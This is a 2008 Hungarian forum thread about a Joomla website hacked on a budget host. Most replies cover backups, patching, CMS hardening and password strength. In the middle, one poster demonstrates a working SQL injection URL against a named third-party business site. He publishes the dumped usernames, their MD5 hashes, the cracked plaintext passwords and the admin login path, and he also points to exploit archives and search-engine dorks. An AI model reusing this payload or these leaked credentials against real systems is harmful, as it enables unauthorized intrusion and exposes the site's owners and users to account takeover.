Feltörték a honlapomat

Security-all

Sziszatok!

Feltörték a honlapomat, ami a dataglobe-nál volt tárolva. Ott azt mondták, hogy valami robot hajtotta végre a tettet, és a honlap adminisztrációs felületén jutottak be, nekik ehhez semmi közük nincs, nem is végeznek biztonsági mentést a honlaptartalomról, igy visszaállitani sem tudják.
Szerintetek korrekt ez igy?
Tényleg nem végeznek a szolgáltatók időszakos mentéseket, vagy csak a dataglobe ilyen amatőr?
A másik, hogy miként lehet védekezni hasonló próbálkozások ellen? A honlapon joomla alapú volt, mivel az ingyenes. Tehát ftp kapcsolaton törik inkább fel, vagy magán, a honlapon keresztül? Megelőzési módja van-e ennek szerintetek? Ubuntu alatt dolgozom, szerintem kicsi az esélye annak, hogy a jelszót az én gépemről lopták volna el, de semmi nem kizárt. Hogyan lehet ennek utánanézni?

köszönettel.

  • 8919 megtekintés

( coder | 2008. 02. 15., p – 17:30 )

99% hogy a joomla -t húzták meg... elég gyakran jönnek ki biztonsági hibák benne

( n4buk0d0n0z0r | 2008. 02. 15., p – 17:30 )

Védekezni úgy lehet hogy ha van saját szervered, amit beviszel egy adatparkba.
Vagy backupolsz saját magadnak.

Amatőrség mentés nélkül hagyni az adatokat, te is lementhetted volna bármikor, a céges gépedre.
SQl táblát sem nagy wasistdas lementeni időnként

Természetesen lementettem a tartalmat a saját gépemre és már vissza is töltöttem azóta.
Csak magától értetődőnek gondoltam volna, hogy a szolgáltató is menti a nála elhelyezett honlaptartalmakat.

Szóval a joomla a hibás? Akkor nem marad más hátra, mint rendszeres backup és visszamásolás, ha baj van.

Egy magara valamit ado adatpark legalabb hetente keszit szalagos mentest, az igaz, hogy ilyen esetben azok viszaa'llitasa koltseges, ezert ha nem az ok hibajukbol kell viszaa'llitani akor azt kulon kell fizetned!
_______________________________________________________
UBUNTU 7.10 Rock's!
Type cat vmlinuz > /dev/audio to hear the Voice of God.

Backup van hw hiba esetére biztos. vagy raid. de gondolom az külön extra, hogy mittomén x időpontra visszamenőleg visszaállítható legyen. Nem túl nehéz megcsinálni szerver szinten, pl. rsback al. De énis csak extraként vállalnám, ha hostingolnék, vagy a visszaállítást legalábbis megfizettetném.

A csomag tartalmazza még:

ingyenes DNS szolgáltatás
időzített PHP futtatási lehetőség
korlátlan PHP használat
korlátlan MySQL használat
korlátlan számú MySQL adatbázis
korlátlan E-mail postafiók
korlátlan számú FTP hozzáférés
korlátlan adatforgalom
látogatottsági statisztika
webmail levelező felület
phpMyAdmin használat
vírusos és SPAM levelek szűrése
RAID mirror adattárolás
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>rendszeres napi adatmentés (backup)<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
99%-os rendelkezésre állás
100 Mbit/s belföldi sávszélesség
1 Mbit/s külföldi sávszélesség
telefonos ügyfélszolgálat

( wladek1 | 2008. 02. 15., p – 17:53 )

Eléggé hihetetlennek tűnik, hogy nem volt biztonsági mentés.
Ha nem volt, akkor én nem sokáig maradnék ilyen helyen...

kötöjelkötöjel
//:wladek's world

( komate | 2008. 02. 15., p – 18:18 )

embeer... :) részvétem...

ha újrateszed az oldalt, használd mondjuk a jomBackup system plugin mambotot.
innen letöltheted:
http://extensions.joomla.org/component/option,com_mtree/task,viewlink/l…

tök egyszerű kis kütyü, naponta egyszer, éjféltájt elküldi egy megadott emailcímre az sql mentést.
még a kisujjadat sem kell mozdítanod, és máris van nem egy, hanem több száz sql mentésed....

én használom :)

--
dont_worry_be_happy

( corvusaze | 2008. 02. 15., p – 18:39 )

MOst ne haragudj, de ezt te cseszted el.
Nem volt feltűnő, hogy 1Gb tárhelyed minden extra szolgáltatással csak 990Ft-ért adnak?
Csak gondolj bele, hogy egy jó szerver min. 500-xxxxeFt + hozzáértő személyzet 200e-xxxeFt/fő és ezer forintos hiper olcsó tárhelyből ezekre nem futja.
Amennyit fizettél olyan szolgáltatást kaptál!

( Lightgod | 2008. 02. 15., p – 18:52 )

Nezzuk...

BackUP: no comment...

Joomla:
2008-02-14:
- http://milw0rm.com/exploits/5120
- http://milw0rm.com/exploits/5119
- http://milw0rm.com/exploits/5118
- http://milw0rm.com/exploits/5117

Ebben ahonapban: 14 exploit jott ki hozza...Nagyjabol mind SQL injection... Nemhinnem, hogy bot es nemhinnem, hoyg az adminon keresztul... Valoszinuleg kijott a hiba... Googleztak es talaltak... meghozza teged is... A Google nagyon szepen megmondja, ha jol kerdezel...

google: powred.by.joobla
kb aztan melleirsz 3 szot hogy miylen stilusu lap legyen =)

Vedekezes:
- Nem hazsnalsz ilyen durvan lyukas rendszert... Ugyanis joomla az egyik legsebezhetobb...
- Atirsz neany konytarat... torlod a nyomait, hogy ez joomla ^_^ akkor nehezebben talalnak hozza exploitot...
--
by lightgod

Ezt is ilyen könnyen törnéd?: penguinclickers.3chq.org
Ez egy "hobby site"-om, de érdeklõdés hiján elég döglött, úgyhogy próbálkozhatsz nyugodtan, ha kell a kihivás. (A "meghivás" csak erre a portálra és CMS-re vonatkozik, az egész szerverre nem, mert az nem az enyém).

Amúgy Dragonfly CMS, ami ugye szintén "konzerv CMS", de még a menüre sem került fel az év CMS-e szavazáson itt a HUP-on...

---
Mondjon le!

Baszki, komolyan fel nem foghatom, hogy hogyan lehet 2008-ban SQL injekcióval feltörni egy magára a valamit is adó honlapmotort???

Nem néztem meg a Joomla forráskódját, de ez így nagyon gáz.
Főleg, hogy pofonegyszerűen lehet ellene védekezni.

Úgy, hogy sok a péhápéokostojás, aki le bír három sort írni, meg látott már sql-t, és ontják magukból a sz...rabbnál sz..abb "kódot"...

az a baj, hogy "péhápébenmegeskúelben" tudnak kódot írni, normálisan programozni viszont -- tisztelet a szűk kivételnek -- nem. Jellemző példaként azt szoktam felhozni, hogy egy "ls -lrt" kimenetet kellett volna html-táblázatként produkálni php-ben a gyerkőcnek, mire mit csinált? Meghívta az ls-t, a form-ban megadott paramétert direktben odaadva a shell parancsnak... Pedig ő már sokt programozott php-ben...

( connor v | 2008. 02. 15., p – 19:07 )

Ilyen a cég. A szolgáltatási szerződésben ott van hogy Te mentesz adatot. Olcsó húsnak híg a leve...

( Lightgod | 2008. 02. 15., p – 19:42 )

http://greenleafwholesale.com/index.php?
option=com_quiz&
task=user_tst_shw&
Itemid=55&
tid=1/**/union/**/select/**/0,
concat(username,0x3a,password),
concat(username,0x3a,password)
/**/from/**/mos_users/*

5 perc google volt... es milw0rm.com ... ennyi...

aztan:
asheflin:f164d5ff6ecefb3bb995e1c145dd9aca
williee:fd820a2b4461bddd116c1518bc4b0f77
gwiltjer:f164d5ff6ecefb3bb995e1c145dd9aca
rirons:f164d5ff6ecefb3bb995e1c145dd9aca

asheflin - trythis1
williee - william
gwiltjer - trythis1
rirons - trythis1

rolando:15f1a49bb12bccf9af12409289c9cd37
15f1a49bb12bccf9af12409289c9cd37 -> trythis1

http://greenleafwholesale.com/administrator/

http://hippy.csoma.elte.hu/~lightgod/screenshot-20080215192557.png

a milw0rm.com-on vannak exploitok es van md5 hash adatbazisa is... onnan tudni a jelszot... admin-e nincs benne =/ ^_^

max 10 perces munka volt et megcsinalni... de MAX 10 perc

Ennyit a joomle-rol

Nem egy nagy was ist das... Ezek meg csak hekkerek se voltak...
--
by lightgod

( tibyke | 2008. 02. 15., p – 20:26 )

nem eleg egyszer feltenni, neha frissiteni is kell szerencsetlen joomla-t.
akarmilyen cms-t is teszel fol, a sajat hulyesegedtol nem fog megvedeni onmagaban.

t

A legujabb Joomlaban is oylan hiba van, hogy egyszeruen nem hoszem el... URL-ben ID-nal sql injection... egyszeruen ne hiszem el... Nah midnegy...

Masik CMS ajanlott =)
amugy meg... Kivedheto viszonylag
megkeresed az osszes Joomla! szoot... kicsereled monnyuk Drupalra... aztan neszeb+... Drupal exploit nemmegy rajta... es nem sokan fogjak feltetelezni, hoyg jooomla ^_^ csak aki tenyleg beleassa magat a paraeterezesbe elrendezesbe forras stilusaba...

--
by lightgod

A mod_security nem szűri ki az ilyen próbálkozásokat?
Ahogy látom a táblák elején a jos_ prefix módosítása is egy védelem az egyszerűbb támadások ellen.
...
Azaz gyakorlatilag ezek nem jelentenek komoly veszélyt egy jól beállított szerveren.
Nem vagyok túl jártas a témába, azaz javítsatok ki ha nincs igazam, ill. szívesen vennék pár ötletet, hogy lehet védekezni a hasonló SQL injection ellen. (Nyilván más cms-nél is vannak hasonló hibák, azaz nem cms-t szeretnék váltani, hanem csökkenteni a kockázatát annak, hogy az én oldalamat is felnyomják.)

Ettől függetlenül számomra is kiábrándító, hogy ennyi hiba van a joomlaba. Főleg hogy használom is, mert funkcionalitása, kezelhetősége, ... szerintem jobb, mint a többi hasonló cms.

"megkeresed az osszes Joomla! szoot... kicsereled monnyuk Drupalra... aztan neszeb+... Drupal exploit nemmegy rajta... es nem sokan fogjak feltetelezni, hoyg jooomla ^_^ csak aki tenyleg beleassa magat a paraeterezesbe elrendezesbe forras stilusaba..."

hát ez elég lol
imho egy joomla oldalról ordít h mi a mögötte lévő cms

Az igaz, DE a google nem dobja ki egybol, hogy "Tessek en tamadhato vagyok"... Tehat a hobbyf@$zagok ellen ved, aki lattya hogy kijott explot es akkor "probaljuk ki, mert a wicces es akor majd igazi cracker leszek, mertmegtortem egy oldalt..."

Szal ertelme van... Persze ha meg akarja valaki olni ugyis megoli, ha ert hozza...
--
by lightgod

erre csak idézni tudom az egyik korábbi hozzászólót (kz86):

"Az átnevezés kb szart sem ér, mert nem úgy találják meg ezeket az oldalakat, hogy google-ba beírják, hogy joomla, hanem így:
inurl:com_akármi"

és ez igaz is. normál esetben nem a "powered by akármi" stb -re keresnek, hanem a már link alapján felfedezhető cms -re v ezáltal akár a kapásból detektálható sérülékeny modulokra...

erre gondoltam én is. szóval az említett módszer inkább csak ál védelem érzetet ad, ellenben a haszna nem túl sok...

( csizmadia_zoltan v | 2008. 02. 15., p – 21:33 )

Szervusz !

Azzal kezdeném, hogy 2-3 éve összesen 3 alkalommal törték fel az otthoni ADSL-es "szerveremet", igaz, akkor még Mandrake 8.2 ment, biztonsági frissítések nélkül.

Részben utalok az egyik mai fórumtémára -a particionálásra-, nálam a / partició max 4 GB, ha külön particióra tudom tenni a /home és/vagy a /var könyvtárakat. Szerencsére a Mandrake alatt sem volt 8 GB-nél nagyobb a teljes linux partició, így annak idején dd -vel kiírtam image állományba, és a későbbiekben elemeztem a behatolási nyomokat. (443-as port - ssl-en keresztül törtek be puffer túlcsordulásos technikával). A syslogot kikapcsolta az intruder, ill visszamenőleg is kitörölt fontos sorokat; de a megmaradt nyomok alapján részben tárolóhelyeket kerestem fel, és töltöttem le exploitokat, részben utánaolvastam a témának.

Jelenleg Debianon megy a webszerver, és eddig még nem vettem észre behatolást. Próbálkozást annál többet.

A biztonsági mentési stratégiám az olyan, hogy van napi mentés, ill óránkénti mentés, részben helyben tárolva, részben távoli külső szerverre feltöltve. Ez alapvető. A távoli mentés esetében értelemszerűen a mentendő adatmennyiség és a rendelkezésre álló sávszélesség a meghatározó.

A szolgáltató mentési kötelezettsége az aláírt szerződéstől függ konkrétan, de ha csak a hirdetésben szerepelt az általad használt csomaghoz és a szerződésbe nem került bele, akkor is lehet emlegetni a Gazdasági Versenyhivatalt és a Fogyasztóvédő Felügyeletet.

Milyen gyakorisággal és milyen módoan (manuálisan vagy automatikusan) történik a csomagok update-elése - frissítése?

Ha ismétlődne újabb betörés, akkor előbb mentsd le image állományba a rendszert, és csak utána állítsd vissza az eredeti állapotot!

CSZ

Köszönöm, ez olyan alapos volt, mintha egy orvosdoktor irta volna :)
Én Ubuntu-t használok automatikus frissitéssel. Nem szerverként, hanem csak egy sima desktopként működik a gépem. A fent leirtak alapján számomra egyértelműnek tűnik, hogy nem a gépemről jutottak be a honlapra (hacsak nem a Firefoxban van valami bug), hanem a password nem volt túlzottan sok karakeres, és egyszerű volt kikódolni. A Joomla 1.5-ös változatát használom (beta).

( corvusaze | 2008. 02. 16., szo – 12:01 )

Szerintem a Joomla! egy teljesen jó CMS, csak 1-2 dolgot kell megjegyezni és alkalmazni:
- táblák előtagját megváltoztatni
- ha lehet könyvtárak neveit megváltoztatni, főként az adminét
- csak megbízható theme-ket/modulokat/extension-öket használni, mivel általában ezekben van a hiba
- összes joomla szót eltávolítani
- egy ilyet használni: http://extensions.joomla.org/index.php?option=com_mtree&task=listcats&c…
- menteni, menteni és menteni!
- jah és talán olyan szolgáltatót választani ami nem csak mondja hanem csinálja is a mentést!

Az átnevezés kb szart sem ér, mert nem úgy találják meg ezeket az oldalakat, hogy google-ba beírják, hogy joomla, hanem így:
inurl:com_akármi

Meg magyarázd már meg ezeket az átlag felhasználóknak, mert nagyon sokszor ilyenek használnak ingyenes cms-eket. Ezért kéne úgy megírni, hogy ha átlag ember használja akkor is biztonságos legyen.

( bilbo | 2008. 02. 16., szo – 12:11 )

Évek óta a dataglobe ügyfele vagyok, alap csomagom van. Természetesen archiválják /naponta/ az adatbázisokat, ezt tartalmazza az alapcsomag díja is. Nekem eddig 3x törték fel az oldalaimat saját hibámból: frissíteni kellett volna. Jelszavaidat ne tárold a gépen és ha lehet live CD-ről adminisztrálj, bankolj!

*pkocsik.com ezt az oldalt is felnyomtak
"This Site Has Been hacked By. ][ SnakE1095 ][ .. Sorry Dude ... .. But U have Bad Security"
ha tudni szeretnekd a oldal a kove IP szamont viseli : 87.229.73.78 segitek a 87.229.73.78 resolves to x78.dataglobe.hu

Lehet h a szolginal van valami??? :D

( zeroms | 2008. 02. 16., szo – 14:16 )

Udv,
en is joomlat hasznalok tobb mint 30 sitehoz, eddig 2ot tortek fel torok egyenek.
Mindkettonel az en hanyagsagom volt az oka, mivel nem frisitettem oket.
Azt kovetoen mindig a legujabbat teszem. (termeszetesen az 1.0.x verziokrol van szo, az 1.5-nek nincs egy honapja, hogy kijott a Stable verzioja, de ez meg messzemenoen nem annyira biztonsagos mint az 1.0 utobbi verzioja )
Eleg amator hosting lehet az aki nem keszit napi backupot, ajanlom, hogy mihamarabb csereld le oket.
Jelenleg az 1.0.14-et hasznalom es nagyon meg vagyok elegedve vele, az 1.0.12 utan teljes gozzel ataltak az 1.5 fejlesztesere, u.h. az 1.0-nal ez utan mar csak security updatek varhatoak.

Egy nagyon nagy biztonsagi hibat sajnos nem lehet elkerulni, az emberi tenyezot, az egyszeru admin jelszok miatt sok webmesternek fajhat a feje. Az eszem neha megall mikor az ugyfelek ien jelszavakat adnak meg a SuperAdmin usernek, hogy: 123456 vagy qwerty!
Ez ellen en egy jelszo komplexitasat figyelo kis scriptel bovitettem a joomla user osztalyat.

administrator/components/com_users/admin.user.php 


43		if ( $_VERSION->RESTRICT == 1 ) {
			mosRedirect( 'index2.php?mosmsg=Functionality Restricted' );
		} else {
46			//Ide a password komplexitasat ellenorzo szkriptet
                        if (chkPassword())
			    saveUser( $task );
                        else
			    mosRedirect( 'index2.php?mosmsg=Password for user to simple!' );

		}

_______________________________________________________
UBUNTU 7.10 Rock's!
Type cat vmlinuz > /dev/audio to hear the Voice of God.

"Egy nagyon nagy biztonsagi hibat sajnos nem lehet elkerulni, az emberi tenyezot"
Olvasd vegig meg 1xer figyelmesebben. Nem azt montam, hogy mas modja nincs, nagyon is tisztaban vagyok vele, hogy van es amint emlitettem mar szanvedtem is miatta.
Tisztaban vagyok vele de az 1.0-as verzio mar par eve letezik es nagyon sok biztonsagi res be van tomkodve rajta, nem lehetetlen de a core-ban mar nem nagyon talalsz olyan biztonsagi hibat amin keresztul feltorhetnek az oldalt. Az mas, hogy mien komponenseket telepitesz meg melle!!! Lehet jo a core ha van egy be'na komponensed telepitve!
_______________________________________________________
UBUNTU 7.10 Rock's!
Type cat vmlinuz > /dev/audio to hear the Voice of God.

Kosz a kiigazitast, kulon ide keszitettem el a rovid kodjegyzetet, mivel en tobbet modositottam a joomla userkezelesen. Megesik, hogy erre nem figyelek, igaz semmi lenyege annak a szovegnek, oda mindenki azt ir amit akar.
_______________________________________________________
UBUNTU 7.10 Rock's!
Type cat vmlinuz > /dev/audio to hear the Voice of God.

( bitumen | 2008. 02. 20., sze – 10:14 )

"Ubuntu alatt dolgozom, szerintem kicsi az esélye annak, hogy a jelszót az én gépemről lopták volna el, de semmi nem kizárt"

Ha ftp-t használsz, akkor vess magadra...

( ibtorma | 2008. 04. 05., szo – 14:53 )

Nekem is feltörték az oldalam ami szintén a dataglobenál van. Igaz nagyon régen rá se néztem be se volt fejezve meg ilyesmi, valamelyik 1.0.x-es Joomla volt rajta. Szerencsére azt az aldomaint nem törték fel amin éles dolog is volt, igaz az nem Joomla alapon, de feltörték az öcsémnek meg az unokatesómnak létrehozott aldomain-t, amik nem Joomlával üzemeltek.
Szóval most cserélem a jelszavakat meg asszem a Joomlát is.

+1..

Én alapból valami komolyabb CMS-t tennék fel és voálá.. na meg jobban kéne ügyelni biztonságra. Nem hinném hogy napi backup nélkül nem lehetne átvészelni. Másrészről.. Csak úgy nem törnek fel egy weblapot..ok nélkül.. (Pl senki nem akarna valami hülye fanclub oldalt feltörni..szerintem)

Inkább a hozzáértés hiánya, mint a hardver minősége az oka ennek.
Most láttam egy olyan szolgáltatót, aki a főoldalán az index.php fájlban ajánlja fel a jelszóváltoztatást, míg az index.html a főoldal.
Erősen gyanítom, hogy shell_exec() használatával.

kötöjelkötöjel
//:wladek's world

( janoszen v | 2008. 04. 05., szo – 23:06 )

Ez a jelenség kisértetiesen hasonlít arra a jelenségre, ami kétszer is előfordult a ma már ex szolgáltatómnál. (Dataglobe-al egy kategóriás "occsóhosting".) A történés az volt, hogy valamelyik kiváló ügyfele valami exploitolható szart üzemeltetett, abból aztán szépen bemászott és vírus módjára megfertőzte az összes PHP fájlt. Ezek után én mondtam meg nekik, hogy kell a PHP-t félig tisztességesen beállítani.

Sajnos az ilyesmi ellen a jelszóváltás nem segít, főleg hogy nem is nálad van a hiba. Keress tisztességes szolgáltatót vagy üzemeltess saját szervert. Én személy szerint a saját szerver mellett döntöttem és annak ellenére, hogy foglalkozni kell vele nem keveset, nem bántam meg.